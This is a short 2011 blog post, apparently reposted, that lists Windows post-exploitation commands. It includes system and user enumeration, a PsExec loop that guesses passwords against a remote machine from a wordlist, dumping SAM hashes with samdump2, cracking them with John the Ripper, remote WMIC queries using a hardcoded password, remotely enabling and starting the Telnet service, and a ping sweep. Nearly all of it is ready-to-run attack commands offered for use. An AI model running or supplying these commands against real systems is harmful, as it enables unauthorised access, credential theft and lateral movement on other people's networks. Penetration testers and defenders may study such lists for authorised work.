Sep 25, 2011

Howto: Command For Information Gathering Of Windows Post Exploitation

If you want to see all command and results of each command, please go to the Source.
 

gathering System related information 


C:\>systeminfo 

Running Services


C:\>tasklist /svc 

Installed Services


C:\>sc query state= all

Current environment settings


C:\>set

Find Username


C:\>set | find "USERNAME"

Find Domain


C:\>set | find "USERDOMAIN"
 

Find Current User Information


C:\>net user John 

Find Users with Administrator Privileges in the current machine


C:\>net localgroup Administrators 

Password Guessing with PsExec

Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt


C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************


Extract Hashes from the sam and system file with samdump2



root@bt:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist


root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt


Gather DNS Information


C:\>ipconfig /displaydns


OS Information


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Process


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief


Local Drives Info


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 


Shares Info


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table


Network Info


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 


List Services Information


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 


Change start mode of service to automatically start upon boot


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 
 

Starting telnet service


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping Sweep


C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"
 
Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html 

If you like my blog, Please Donate Me

No comments:

 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |